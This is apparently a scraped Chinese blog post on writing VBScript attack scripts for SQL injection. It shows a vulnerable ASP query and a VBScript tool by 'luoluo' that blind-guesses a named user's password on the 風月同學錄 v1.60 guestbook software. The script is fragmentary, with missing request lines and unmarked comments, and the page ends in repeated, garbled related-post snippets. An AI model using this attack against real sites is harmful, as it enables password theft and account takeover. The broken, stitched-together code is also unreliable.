用vbs來寫sql注入等80埠的攻擊指令碼

2021-04-23 03:23:27 字數 2659 閱讀 6641

...

topicid=request("rootid")

sql="select topic,hits from bbs

where parentid=0 and bbsid="&topicid

set rs=conn.execute(sql)

...

非常古老且經典的乙個,呵呵,試了下:

資料表結構我都知道,使用者名稱也都可以在使用者列表看出來,那麼這個例子就演示一下猜解密碼,什麼?太簡單了?只是個例子嘛,別笑哦~~寫的時候也不是一帆風順~~寫的很差,尤其迴圈裡如果探測到正確的就應該退出迴圈,但是想不起來怎麼退出了(break?exit?),不過對於這個密碼明文存放的程式來說已經夠了,乙個6位的密碼用了15秒左右猜出,改進下會提高不少,但效率上始終和perl不能比了。

要使用這個物件要裝microsoft act是visual studio.net裡乙個工具,我在另一台機器上直接用regsrv32註冊相關的dll失敗了,所以還是要裝一下。

*********************************************

風月同學錄v1.60漏洞測試指令碼 by luoluo

注意:需要裝visual studio.net裡的act工具

*********************************************

option explicit

on error resume next

dim test

dim o_response

dim wrong

dim i,j,k

dim pwd_len

dim pwd

dim strings

dim username

從命令列得到要破解的人的使用者名稱

if wscript.arguments.count > 0 then

username = wscript.arguments(0)

else

username = "luoluo"

end if

wscript.echo "開始探測,請等待... ..."

正確頁面的標誌,這個隨便找的,因為只要是兩個頁面返回的不同部分就可以了

wrong = "luoluoisachinesehacker"

存放密碼

pwd = ""

密碼的字元範圍

strings = "0123456789abcdefghijklmnopqrstuvwxyz"

建立物件

set test = createobject("act.test")

得到使用者的密碼的長度

for i = 0 to 128 step 1

傳送請求,返回乙個response物件,位址長可以用&分成段,那樣好看一些

如果返回的頁面裡有正確標誌那麼長度就對了

if instr(o_response.body, wrong) <> 0 then

pwd_len = "" & i & ""

end if

next

猜解使用者的密碼

wscript.echo "錯誤:" & error.description

error.clear

else

輸出密碼

wscript.echo "密碼:" & pwd

end if

set test = nothing

用vbs來寫sql注入等80埠的攻擊指令碼

topicid request rootid sql select topic,hits from bbs where parentid 0 and bbsid topicid set rs conn.execute sql 非常古老且經典的乙個,呵呵,試了下 showthread.asp?root...

用vbs來寫sql注入等80埠的攻擊指令碼

topicid request rootid sql select topic,hits from bbs where parentid 0 and bbsid topicid set rs conn.execute sql 非常古老且經典的乙個,呵呵,試了下 showthread.asp?root...

sql盲注特點 SQL盲注

盲注原理 盲注的分類 盲注常用函式 一 sql盲注概述 1.如果資料庫執行返回結果時只反饋對錯不會返回資料庫中的資訊 此時可以採用邏輯判斷是否正確的盲注來獲取資訊。2.盲注是不能通過直接顯示的途徑來獲取資料庫資料的方法。在盲注中,攻擊者根據其返回頁面的不同來判斷資訊 可能是頁面內容的不同,也可以是響...